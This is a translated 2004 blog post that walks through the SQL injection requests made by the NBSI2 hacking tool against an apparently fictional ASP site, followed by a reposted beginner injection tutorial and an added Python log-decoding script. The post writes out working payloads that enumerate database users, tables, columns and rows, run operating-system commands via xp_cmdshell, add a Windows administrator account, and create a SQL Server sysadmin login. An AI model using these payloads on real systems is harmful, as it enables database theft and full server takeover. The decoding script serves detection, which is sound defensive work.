The secrets of NBSI2's internal functions revealed

xiaoxiao2021-03-06  18

SQL injection is very popular these days. Anyone who has used Xiaozhu's NB2 knows that this tool is close to invincible: even a rookie can use it to hack a site. But someone who does not understand the injection process can never improve and will always remain a rookie. First of all, I am just a rookie myself; I have only recently been studying SQL, and I am studying the NB2 injection process. The tool WSE should be familiar to everyone; it can be found all over the net, but here is one address: http://www.gxgl.com/soft/wse06b1.zip. It is a program for monitoring and modifying the data sent and received over the network, and it can help you debug web applications. Less talk, let's start. First find a site with a SQL injection vulnerability, www.testdb.net, and an injection point: http://www.testdb.net/Article_read.asp?id=80 (of course, the website www.testdb.net does not really exist).

Procedure 1: obtaining the SQL Server database information

Open NB2, type the address http://www.testdb.net/Article_read.asp?id=80, select the "GET" mode and click the "Detect" button. NB2 reports the following SQL Server database information:

    Unknown
    Sub-query: supported
    Current user: test
    User permissions: DB_OWNER
    Current database: TestDB

Anyone who has used NB2 should be familiar with the above. A few notes for reading the captures below: %20 decodes to a space, %2B to a plus sign and %25 to a percent sign; "HTTP/1.1 200 OK" means the request succeeded and "HTTP/1.1 500 Internal Server Error" means it failed. The GET packets captured with WSE during detection are as follows:

GET /article_read.asp?id=80 HTTP/1.1

GET /article_read.asp?id=80%20And%20User%2bchar(124)=0 HTTP/1.1
that is: article_read.asp?id=80 and user+char(124)=0, where char(124) is the character '|'

GET /article_read.asp?id=80;declare%20@a%20INT-- HTTP/1.1
that is: article_read.asp?id=80;declare @a int-- // determines whether multiple (stacked) queries are supported

GET /article_read.asp?id=80 and%20(SELECT%20count(1)%20FROM%20[Sysobjects])>=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80%3Bdeclare %40a int%2D%2D; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
that is: article_read.asp?id=80 and (select count(1) from [sysobjects])>=0 // determines whether sub-queries are supported

GET /article_read.asp?id=80 and User+char(124)=0 HTTP/1.1
(other headers as in the capture above)
Cookie: articleid=80 and %28select count%281%29 from %5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
that is: article_read.asp?id=80 and user+char(124)=0 // gets the current user

user is a built-in variable of SQL Server:

its value is the user name of the current connection, and its type is nvarchar. Comparing an nvarchar value with the int 0 makes the system try to convert the nvarchar value to int, and that conversion is certain to fail. SQL Server's error message is: Syntax error converting the nvarchar value 'EAST_ASP' to a column of data type int. EAST_ASP is exactly the value of the variable user, so the database user name has been obtained without any effort. (The same applies to "and user>0".)

GET /article_read.asp?id=80 and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))+char(124)=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80 and %28select count%281%29 from %5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
that is: article_read.asp?id=80 and cast(is_srvrolemember(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

Function description: IS_SRVROLEMEMBER indicates whether the current user's login is a member of the specified server role.
Syntax: IS_SRVROLEMEMBER('role' [, 'login'])
'role' is the name of the server role being checked; its data type is sysname. The valid values for role are: sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin.
'login' is the optional name of the login to check; its data type is sysname and the default value is NULL. If it is not specified, the current user's login account is used.

select cast(is_srvrolemember(0x730079007300610064006D0069006E00) as varchar(1))+char(124) returns "1|".

GET /article_read.asp?id=80 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2bchar(124)=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80 and %28select count%281%29 from %5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
that is: article_read.asp?id=80 and cast(is_member(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1

select cast(is_member(0x640062005F006F0077006E0065007200) as varchar(1))+char(124) also returns "1|", the same as the result above, but notice that the long string inside is_member is different. I do not know what it means. Converting 0x730079007300610064006D0069006E00 gives "| o | @ e"; I thought it would be a string like "sysadmin", but it does not seem to be. Forget it, never mind. I think its purpose should be to get the rights of the current user, for example db_owner.

GET /article_read.asp?id=80 and db_name()+char(124)=0 HTTP/1.1
(other headers as in the capture above)
Cookie: articleid=80 and %28select count%281%29 from %5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
that is: article_read.asp?id=80 and db_name()+char(124)=0

Here we see the db_name() function; not much to say, everyone should know it. db_name() is another system variable, returning the name of the connected database. With that, the analysis of the process of obtaining the SQL database information is complete.

In addition: the POST method is not analyzed in detail here; you can look at it yourself. Below are the packets captured when the POST method is used. The details are basically the same as for the GET method; mainly look at the last line of information. Many techniques are used in it, among them:

id=80%20and%20User%2bchar(124)=0
id=80'%20and%20User%2bchar(124)=0%20and%20''='
id=80%25'%20and%20User%2bchar(124)=0%20and%20'%25'='
id=80%20and%201=1
id=80%20and%201=2
id=80'%20and%201=1%20and%20''='
id=80'%20and%201=2%20and%20''='
id=80%25'%20and%201=1%20and%20'%25'='
id=80%25'%20and%201=2%20and%20'%25'='

Procedure 2: guessing table names

TOP 1 (the start of this request line was lost in the capture):
%20CAST(Name%20AS%20varchar(8000))%20FROM(SELECT%20top%201%20ID,Name%20FROM%20[TestDB]..[Sysobjects]%20where%20XTYPE=CHAR(85)%20ORDER%20by%20ID)%20T%20ORDER%20BY%20ID%20DESC)>0 HTTP/1.1
that is: article_read.asp?id=80 and (select top 1 cast(Name as varchar(8000)) from (select top 1 id,Name from [testdb]..[sysobjects] where xtype=char(85) order by id) T order by id desc)>0

char(85) = 'U'. This gets the table name of the first table in the TestDB database; by analogy, TOP N gets the other table names.

TOP 2:
GET /Article_read.asp?id=80 and (select top 1 cast(Name as varchar(8000)) FROM (SELECT TOP 2%20ID,NAME%20FROM%20[testdb]..[sysobjects]%20where%20XTYPE=CHAR(85)%20ORDER%20BY%20ID)%20T%20ORDER%20BY%20ID%20DESC)>0 HTTP/1.1
...
TOP N: ...

WSE packet capture:
GET /Article_read.asp?id=80%20And%20(Select%20top%201%20cast(Name%20AS%20Varchar(8000))%20FROM(select%20top%201%20ID,Name%20FROM%20[TestDB]..[sysobjects]%20where%20XTYPE=CHAR(85)%20ORDER%20BY%20ID)%20T%20ORDER%20BY%20ID%20DESC)>0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28select count%281%29 from %5Bsysobjects%5D%29%3E%3D0
...

Procedure 3: guessing column names from a table name

Table name: Article
TOP 1:
GET /Article_read.asp?id=80%20And%20(select%20top%201%20cast(Name%20AS%20VARCHAR(8000))%20FROM%20(select%20top%201%20colid,NAME%20FROM%20[testdb]..[syscolumns]%20where%20id=object_id(nchar(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20ORDER%20BY%20Colid)%20T%20ORDER%20BY%20Colid%20Desc)>0 HTTP/1.1
that is: article_read.asp?id=80 and (select top 1 cast(Name as varchar(8000)) from (select top 1 colid,Name from [testdb]..[syscolumns] where id=object_id(nchar(101)+nchar(97)+nchar(115)+nchar(116)+nchar(104)+nchar(111)+nchar(116)+nchar(46)+nchar(46)+nchar(65)+nchar(82)+nchar(84)+nchar(73)+nchar(67)+nchar(76)+nchar(69)) order by colid) T order by colid desc)>0

This gets the column name of the first column of the article table; by analogy, TOP N gets the other column names.

Function description: OBJECT_ID returns the database object identification number.
Syntax: OBJECT_ID('object')
'object' is the object to use; its data type is char or nchar. If the data type of object is char, it is implicitly converted to nchar.

Return type: int.

nchar(101)+nchar(97)+nchar(115)+nchar(116)+nchar(104)+nchar(111)+nchar(116)+nchar(46)+nchar(46)+nchar(65)+nchar(82)+nchar(84)+nchar(73)+nchar(67)+nchar(76)+nchar(69) corresponds to the string testdb..article, so the request is:
article_read.asp?id=80 and (select top 1 cast(Name as varchar(8000)) from (select top 1 colid,Name from [testdb]..[syscolumns] where id=object_id('testdb..article') order by colid) T order by colid desc)>0

TOP 2:
GET /article_read.asp?id=80 and (select top 1 cast(Name AS varchar(8000)) FROM (select top 2%20colid,Name%20FROM%20[TestDb]..[Syscolumns]%20where%20ID%20=%20object_ID(Nchar(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20ORDER%20BY%20Colid)%20t%20ORDER%20BY%20Colid%20Desc)>0 HTTP/1.1
TOP N: ...

WSE packet capture:
GET /article_read.asp?id=80 and (SELECT%20top%201%20CAST(Name%20AS%20varchar(8000))%20FROM%20(select%20top%201%20Colid,Name%20FROM%20[TestDB]..[Syscolumns]%20where%20ID%20=%20Object_ID(nchar(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20ORDER%20BY%20COLID)%20t%20ORDER%20BY%20Colid%20Desc)>0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28Select count%281%29 from %5Bsysobjects%5D%29%3E%3D0
...

Procedure 4: guessing field contents from a column name

Field name: Title
TOP 1:
GET /article_read.asp?id=80 and (select top 1%20ISNULL(Cast([Title] AS varchar(8000)),CHAR(32))+char(124)%20FROM%20(SELECT%20top%201%20[Title]%20FROM%20[TestDb]..[article]%20where%201=1%20ORDER%20BY%20[Title])%20T%20ORDER%20BY%20[Title]%20DESC)>0 HTTP/1.1
that is: article_read.asp?id=80 and (select top 1 isnull(cast([Title] as varchar(8000)),char(32))+char(124) from (select top 1 [Title] from [testdb]..[article] where 1=1 order by [Title]) T order by [Title] desc)>0

This obtains the value of the Title field in the first row; by analogy, TOP N gets the values of the other rows.

TOP 2:
GET /Article_read.asp?id=80 and (select top 1%20ISNULL(Cast([Title] AS varchar(8000)),CHAR(32))+char(124)%20FROM%20(Select%20top%202%20[Title]%20FROM%20[testdb]..[article]%20where%201=1%20ORDER%20BY%20[Title])%20T%20ORDER%20BY%20[Title]%20DESC)>0 HTTP/1.1
TOP N: ...

WSE packet capture:

// get the number of records in the article table
GET /article_read.asp?id=80 and (select cast(count(1)%20AS%20Varchar(8000))%2bchar(124)%20FROM%20[TestDb]..[article]%20where%201=1)>0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28select count%281%29 from %5Bsysobjects%5D%29%3E%3D0

// get the content of the first record of the Title field of the article table
GET /Article_read.asp?id=80 and (select%20top%201%20isnull(CAST([Title]%20AS%20VARCHAR(8000)),CHAR(32))%2BCHAR(124)%20FROM%20(SELECT%20top%201%20[Title]%20FROM%20[Testdb]..[article]%20where%201=1%20order%20BY%20[Title])%20T%20ORDER%20BY%20[Title]%20DESC)>0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28Select count%281%29 from %5Bsysobjects%5D%29%3E%3D0
...

Analysis of the other main functions
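As an added example (not part of the original article, and not code from NBSI2 or WSE), the following Python script decodes captured GET request lines such as the ones above into readable SQL and tags the probes they contain, so that someone reviewing a web log can recognise this traffic; it undoes the percent-encoding, the char()/nchar() concatenation chains and the 0x... nvarchar literals. The sample request lines are constructed after the captures above, and the signature names are my own labels.

```python
"""Decode NB2-style captured requests and flag the SQL injection probes they carry.

Added example, not code from the original article, NBSI2 or WSE. The sample
request lines are constructed after the captures above; the signature names
are the author's own labels.
"""
import re
from urllib.parse import unquote, urlsplit

# Probe signatures, matched against the percent-decoded query string.
# Assumption: these substrings do not occur in legitimate article_read.asp requests.
SIGNATURES = {
    "current-user probe": re.compile(r"\buser\s*\+\s*char\(124\)", re.I),
    "type-conversion probe": re.compile(r"\buser\s*>\s*0\b", re.I),
    "role check": re.compile(r"\bis_(?:srv)?(?:role)?member\s*\(", re.I),
    "database-name probe": re.compile(r"\bdb_name\s*\(\s*\)", re.I),
    "boolean probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "stacked query": re.compile(r";\s*(?:declare|exec|drop|create|bulk|alter)\b", re.I),
    "system-table read": re.compile(r"\bsys(?:objects|columns)\b", re.I),
    "row enumeration": re.compile(r"\btop\s+\d+\b.*\border\s+by\b.*\bdesc\b", re.I),
    "command execution": re.compile(r"\bxp_cmdshell\b", re.I),
    "login/role change": re.compile(r"\bsp_add(?:login|srvrolemember)\b", re.I),
}

# char(n)+nchar(m)+... chains build a string one code point at a time.
CHAR_CHAIN = re.compile(r"(?:\bn?char\(\d+\)\s*\+\s*)*\bn?char\(\d+\)", re.I)
# 0x... literals passed to is_srvrolemember()/is_member() are nvarchar, i.e. UTF-16LE.
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]{2,})\b", re.I)


def _decode_char_chain(match):
    codes = re.findall(r"n?char\((\d+)\)", match.group(0), re.I)
    return "'" + "".join(chr(int(code)) for code in codes) + "'"


def _decode_hex(match):
    raw = bytes.fromhex(match.group(1))
    if len(raw) % 2:
        return match.group(0)          # odd length: not a UTF-16 string, leave it
    try:
        text = raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return match.group(0)
    return "N'" + text + "'" if text.isprintable() else match.group(0)


def analyze_request(request_line):
    """Take one 'GET /path?query HTTP/1.1' line (spaces inside the query allowed,
    as WSE shows them) and return the path, the readable query and the probe tags."""
    method, rest = request_line.strip().split(" ", 1)
    target, _version = rest.rsplit(" ", 1)
    parts = urlsplit(target)
    decoded = re.sub(r"\s+", " ", unquote(parts.query)).strip()
    tags = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    readable = CHAR_CHAIN.sub(_decode_char_chain, decoded)
    readable = HEX_LITERAL.sub(_decode_hex, readable)
    return {"method": method, "path": parts.path, "query": readable, "tags": tags}


def flagged_requests(lines):
    """Return the analysis of every request line that carries at least one probe tag."""
    return [r for r in (analyze_request(line) for line in lines) if r["tags"]]


# Constructed sample: request lines modelled on the captures above, plus one benign request.
SAMPLE_REQUESTS = [
    "GET /article_read.asp?id=80 HTTP/1.1",
    "GET /article_read.asp?id=80%20And%20User%2bchar(124)=0 HTTP/1.1",
    "GET /article_read.asp?id=80;declare%20@a%20INT-- HTTP/1.1",
    "GET /article_read.asp?id=80 and cast(is_srvrolemember(0x730079007300610064006d0069006e00)"
    " as varchar(1))+char(124)=1 HTTP/1.1",
    "GET /article_read.asp?id=80%20and%20(select%20top%201%20cast(Name%20as%20varchar(8000))"
    "%20from%20(select%20top%201%20colid,Name%20from%20[testdb]..[syscolumns]%20where%20id="
    "object_id(nchar(116)%2Bnchar(101)%2Bnchar(115)%2Bnchar(116)%2Bnchar(100)%2Bnchar(98)"
    "%2Bnchar(46)%2Bnchar(46)%2Bnchar(97)%2Bnchar(114)%2Bnchar(116)%2Bnchar(105)%2Bnchar(99)"
    "%2Bnchar(108)%2Bnchar(101))%20order%20by%20colid)%20T%20order%20by%20colid%20desc)>0 HTTP/1.1",
]

if __name__ == "__main__":
    for finding in flagged_requests(SAMPLE_REQUESTS):
        print(finding["path"], "|", ", ".join(finding["tags"]))
        print("   ", finding["query"])
```

Decoding the hex literal in the fourth sample line shows the role name that is_srvrolemember() is actually being asked about, which the article leaves as an open question.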

Procedure 5: executing DOS commands and SQL statements

Executing the DOS command dir c:\ with returned output; capture analysis:

GET /article_read.asp?id=80 and db_name()+char(124)=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28Select count%281%29 from %5Bsysobjects%5D%29%3E%3D0

GET /article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'DIR%20C:\%20>%20c:\nb_commander_txt.log';DROP%20Table%20NB_Commander_TMP;CREATE%20TABLE%20NB_Commander_TMP(ResultTXT varchar(7996)%20NULL);Bulk%20Insert%20[TestDB]..[NB_COMMANDER_TMP]%20FROM%20'c:\nb_commander_txt.log' With (KeepNulls);ALTER%20table%20NB_Commander_TMP%20Add ID INT%20NOT%20NULL%20IDENTITY%20(1,1)-- HTTP/1.1
(other headers as in the capture above)
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80 and %28Select count%281%29 from %5Bsysobjects%5D%29%3E%3D0

The main part is this:
article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'Dir C:\ > C:\NB_Commander_Txt.log';DROP TABLE NB_Commander_Tmp;CREATE TABLE NB_Commander_Tmp(ResultTxt varchar(7996) NULL);BULK INSERT [testdb]..[NB_Commander_Tmp] FROM 'C:\NB_Commander_Txt.log' WITH (KEEPNULLS);ALTER TABLE NB_Commander_Tmp Add ID INT Not Null Identity(1,1)--

BULK INSERT copies a data file into a database table or view in a format specified by the user. KEEPNULLS specifies that empty columns keep a null value during the bulk copy operation rather than being assigned the default value for the inserted column. For the details, consult the T-SQL syntax reference, which describes them in detail.

The function of the above statement is to save the result of the DOS command dir c:\ to the file nb_commander_txt.log, then write the contents of this file into the newly created temporary table NB_Commander_Tmp, and add an auto-increment field ID. I believe everyone finds it easy to understand.

ID=1:
GET /article_read.asp?id=80 and (select top 1 case When ResultTxt is null Then '|' ELSE ResultTxt%2B'|'%20end%20FROM%20NB_Commander_TMP%20where%20ID=1)=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC MASTER%2E%2EXP%5FCMDSHELL %27Dir C%3A%5C %3E C%3A%5CNB%5FCommander%5FTxt%2Elog%27%3BDROP TABLE NB%5FCommander%5FTmp%3BCREATE TABLE NB%5FCommander%5FTmp%28ResultTxt varchar%287996%29 NULL%29%3BBULK INSERT %5Btestdb%5D%2E%2E%5BNB%5Fcommander%5FTMP%5D FROM %27C%3A%5CNB%5Fcommander%5FTXT%2ELOG%27 with %28Keepnulls%29%3Balter Table NB%5Fcommander%5FTMP Add ID INT NOT NULL IDENTITY %281%2C1%29%2D%2D
that is: article_read.asp?id=80 and (select top 1 case when ResultTxt is null then '|' else ResultTxt+'|' end from nb_commander_tmp where ID=1)=0

This returns the first line of the echoed output; in the same way, TOP N returns all of the echoed output.

ID=2:
GET /article_read.asp?id=80 and (select top 1 case When ResultTxt is null Then '|' ELSE ResultTxt%2b'|'%20END%20FROM%20NB_Commander_TMP%20where%20ID=2)=0 HTTP/1.1
(other headers as in the capture above)
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC MASTER%2E%2EXP%5FCMDSHELL %27Dir C%3A%5C %3E C%3A%5CNB%5FCommander%5FTxt%2Elog%27%3BDROP TABLE NB%5FCommander%5FTmp%3BCREATE TABLE NB%5FCommander%5FTmp%28ResultTxt varchar%287996%29 NULL%29%3BBULK INSERT %5Btestdb%5D%2E%2E%5BNB%5Fcommander%5FTMP%5D FROM %27C%3A%5CNB%5Fcommander%5FTXT%2ELOG%27 with %28Keepnulls%29%3Balter Table NB%5Fcommander%5FTMP Add ID INT NOT NULL IDENTITY %281%2C1%29%2D%2D
ID=N: ...

What NB2 displayed was: [unexpected output] [unexpected output] [unexpected output] ... If there had been no problem, it would have shown the file listing of C:\. The prompt above is probably because the table NB_Commander_Tmp was not created successfully, so the output could not be shown correctly.

Capture analysis without returned output:

DOS command dir c:\
GET /article_read.asp?id=80;exec master..xp_cmdshell 'dir c:\'-- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BDROP TABLE NB%5FCommander%5FTmp%3BEXEC MASTER%2E%2EXP%5FCMDSHELL %27DEL C%3A%5CNB%5FCommander%5FTxt%2Elog%27%2D%2D
that is: article_read.asp?id=80;exec master..xp_cmdshell 'dir c:\'-- (no output needs to be displayed)

With output displayed, executing the DOS command net user TsInternetUsers password /add:
GET /article_read.asp?id=80;exec master..xp_cmdshell 'Net User TSINTERNETUSERS Password /Add'-- HTTP/1.1
(other headers as in the capture above)
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3Bexec Master%2E%2EXP%5FCMDSHELL %27DIR C%3A%5C%27%2D%2D

Other DOS commands are executed the same way:

id=80;EXEC MASTER..XP_CMDSHELL 'net user TsInternetUsers Password /add'--
id=80;EXEC MASTER..XP_CMDSHELL 'net localgroup administrators TsInternetUsers /add'--

Executing SQL commands (the same as executing DOS commands):
GET /article_read.asp?id=80;EXEC%20master..sp_addlogin%20USERNAME,Password-- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC MASTER%2E%2EXP%5FCMDSHELL %27net user TsInternetUsers Password %2FADD%27%2D%2D

id=80;exec master..sp_addlogin username,password--
id=80;exec master..sp_addsrvrolemember username,sysadmin--
....

That concludes the analysis of NB2's main functions; the other functions you can analyze yourselves. This is the first time I have written such a long article, so it may be chaotic and there are certainly many problems, but I do not have the energy to revise it; I hope everyone can understand. Thank you!

Hnxyy, 2004/11/26, 10:30 at night

Posted on November 26, 2004 7:51 PM

Comments

Reprinted, thank you! 2004-11-27 5:30 PM | Zer0R2y

Don't call it invincible, good fortune 2004-11-27 9:09 PM | Tiger

Reposted: NB Xiaozhu's tutorial "SQL Injection Tianshu" (the heavenly book of SQL injection), an introduction to ASP injection vulnerabilities. With the development of applications built in the B/S mode, more and more programmers write applications using this model. However, due to the high entry threshold in this industry, the level and experience of programmers are uneven, and a considerable proportion of programmers do not check the legality of user input when writing code, so their applications have security hazards.
A user can submit a piece of database query code and, based on the results returned by the program, obtain certain data he wants; this is the so-called SQL Injection. SQL injection comes in through the normal WWW port, and on the surface it looks no different from ordinary web page access, so the firewalls currently on the market do not raise any alert on SQL injection; if the administrator does not have the habit of viewing the IIS logs, the intrusion may go unnoticed for a long time. However, the technique of SQL injection is quite flexible, and many unexpected situations arise when injecting. Whether you can analyze the specific situation, construct a clever SQL statement and thereby successfully obtain the desired data is the fundamental difference between a master and a "rookie".

According to national conditions, domestic websites using ASP+Access or SQL Server account for more than 70%, PHP+MySQL accounts for 20%, and all others for less than 10%. In this article we explain the methods and techniques of ASP injection from beginner to advanced to expert; the PHP injection article is written by another friend, Zwell of the NB Alliance. I hope it is useful to security workers and programmers. Friends who already know ASP injection, please do not skip the beginner section, because some people have misunderstandings about the basic methods of judging injection. Are you ready? Let's go...

Beginner level

If you have never tried SQL injection before, the first step is to uncheck IE menu => Tools => Internet Options => Advanced => Show friendly HTTP error messages. Otherwise, whatever the server returns, IE only shows an HTTP 500 server error and no further prompt information can be obtained.

Section 1: The principle of SQL injection

Let us begin with a website, www.19cn.com (note: this article has long had the site's agreement; most of the data is real). On the website's home page there is a link "IE cannot open a new window", with the address http://www.19cn.com/showdetail.asp?id=49. When we append a single quote ' after this address, the server returns the following error message:

Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'ID=49''.
/showdetail.asp, line 8

From this error message we can see the following:
1. The website uses an Access database and connects to it through the JET engine, not through ODBC.
2. The program does not check whether the data submitted by the client meets the program's requirements.
3. The SQL statement queries with a field named ID.
From the above example we know that the principle of SQL injection is to submit specially crafted code from the client, collect the error information of the program and the server, and thereby obtain the information you want.

Section 2: Judging whether injection is possible

Having read the previous section, some people will think: I only need to test with a single quote, isn't that very simple? In fact, this is not the best method. Why? First, the IIS of every server does not necessarily return the specific error message to the client; if the program has added such a check, SQL injection will not succeed, but the server will still report an error, and the specific prompt is: Error on the server when processing the URL. Please contact the system administrator.

Second, some programmers who have a little understanding of SQL injection think that filtering out single quotes is safe; this situation is not rare. If you test with single quotes, you cannot find the injection point. What test method is more accurate, then? The answer is as follows:

1. http://www.19cn.com/showdetail.asp?id=49
2. http://www.19cn.com/showdetail.asp?id=49 and 1=1
3. http://www.19cn.com/showdetail.asp?id=49 and 1=2

This is the classic 1=1, 1=2 test method. How to judge? Look at the results returned by the three URLs.

Injection is possible when:
1 displays normally (this is inevitable; otherwise the program has an error);
2 displays normally, with basically the same content as 1;
3 prompts BOF or EOF (the program did no checking), or prompts that the record cannot be found (when rs.eof), or displays an empty page (the program added on error resume next).

When injection is not possible it is easier to judge: 1 likewise displays normally, while 2 and 3 generally show an error message defined by the program, or a type conversion error prompt. Of course, this is only the judgment method used when the incoming parameter is numeric. In actual applications there are also character-type and search-type parameters, which I will analyze in "General steps of SQL injection" in the intermediate section.

Section 3: Determining the database type and the injection method

Different databases have different functions and injection methods, so we must judge the type of database before injecting. The databases most often paired with ASP are Access and SQL Server; more than 99% of the websites online use one of the two. How do you make the program tell you which database it uses? Take a look: SQL Server has some system variables; if the server's IIS prompts are not turned off and SQL Server returns an error prompt, you can get it directly from the error message. The method is as follows:

http://www.19cn.com/showdetail.asp?id=49 and user>0

This sentence is very simple, but it contains the essence of SQL Server's unique injection method.
I also discovered this highly efficient method by accident during a test. Let me explain its meaning: first, the preceding statement is normal; focus on "and user>0". We know that user is a built-in variable of SQL Server whose value is the currently connected user name, of type nvarchar. Comparing an nvarchar value with the int 0 makes the system try to convert the nvarchar value to int, and of course that process is certain to fail; SQL Server's error prompt is: Syntax error converting the nvarchar value 'abc' to a column of data type int. abc is exactly the value of the variable user, so the database user name is obtained without any effort. In the following pages everyone will see many statements that use this method. By the way, as everyone knows, SQL Server's user sa is a role equivalent to Administrators; with sa permissions you are almost certain to get the host's Administrator.

The above method can conveniently test whether the login is sa: if it is an sa login, the prompt is that converting "dbo" to int fails, not "sa". If the server's IIS does not allow error prompts to be returned, how do you determine the database type? We can start from the differences between Access and SQL Server. Each has its own system tables, such as the table that stores all objects in the database: in Access it is the system table [msysobjects], which in a web environment reads as "no permission"; in SQL Server it is the table [sysobjects], which can be read normally in a web environment. Where injection is possible, use the following statements:

http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)>0
http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)>0

If the database is SQL Server, the page for the first URL is basically the same as the original page http://www.19cn.com/showdetail.asp?id=49; the second URL, because the table msysobjects cannot be found, prompts an error, and even if the program has fault tolerance, the page is completely different from the original page. If the database is Access, the situation is different: the page for the first URL is completely different from the original page; for the second URL, it depends on whether the database settings allow reading the system table, which is generally not allowed, so it is also completely different from the original page. In most cases, the first URL is enough to know the database type the system uses; the second URL is used only for verification when IIS error prompts are turned off.

Intermediate level

In the beginner section we learned the method of judging SQL injection, but that is not enough to obtain the website's confidential content.
Next we continue to learn how to obtain the content we want from the database. First, let us look at the general steps of SQL injection.

Section 1: General steps of SQL injection

First, determine the environment, find the injection point, and determine the database type; this was introduced in the beginner section.

Second, according to the type of the injection parameter, reconstruct in your mind the original appearance of the SQL statement. By parameter type there are mainly the following three:

(a) id=49. This type of injection parameter is numeric, and the SQL statement is roughly: SELECT * FROM tablename WHERE field=49. The injected parameter is id=49 and [query condition], which generates the statement: SELECT * FROM tablename WHERE field=49 and [query condition].

